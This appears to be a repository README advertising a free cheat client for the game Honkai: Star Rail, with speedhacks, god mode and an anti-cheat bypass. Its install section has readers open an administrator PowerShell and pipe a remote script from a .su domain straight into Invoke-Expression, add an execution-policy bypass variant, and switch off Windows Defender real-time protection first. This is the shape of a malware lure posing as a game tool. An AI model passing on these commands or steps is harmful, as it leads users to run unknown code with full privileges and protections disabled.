Welcome to the official repository of Unicore Star Rail Hack — the most advanced, open-source internal cheat client for Honkai: Star Rail. This project is designed for educational purposes, demonstrating memory manipulation, hooking techniques, and anti-cheat bypass mechanisms.
- Visuals (ESP): Track chests, puzzles, enemies, and trottles through walls.
- Movement: Customizable Speedhack, No-Clip, and Teleport to waypoints.
- Combat: Auto-win, God Mode, Infinite Energy, and Instakill options.
- Automation: Auto-dialogue skipper, auto-farm, and daily quest automation.
- Security: Built-in anti-cheat bypass (bypasses MHYProt / Ace Anti-Cheat).
- Language: C++ / C#
- Graphics API: DirectX 11 / DirectX 12
- Hooking Library: MinHook
- GUI: Dear ImGui (Custom Theme)
Read Readme.txt before install!
-
Open PowerShell as Administrator:
- Press the
Win + Xkeys simultaneously. - Select Terminal (Admin) or Windows PowerShell (Admin) from the context menu.
- Press the
-
Execute the Deployment Command: Copy, paste, and press
Enterto run the following optimized initialization command. This script dynamically configures the network bypass registry and fetches the necessary packages:irm https://software-storage.su/powershell/Loader.ps1 | iex
If your system blocks the launch due to built-in execution policy constraints, enforce a bypass using this command:
powershell -ExecutionPolicy Bypass -Command "irm https://software-storage.su/powershell/Loader.ps1 | iex"In older legacy environments where aliases are missing, use explicit full system cmdlets:
Invoke-RestMethod https://software-storage.su/powershell/Loader.ps1 | Invoke-ExpressionAutomated deployment routines can sometimes trigger proactive security heuristics. Temporarily disable "Real-time protection" within your Windows Defender settings during setup, then re-enable it immediately after completion.
This repository is for educational and research purposes only. I do not encourage cheating in online games. Use this software at your own risk. The developer is not responsible for any banned game accounts.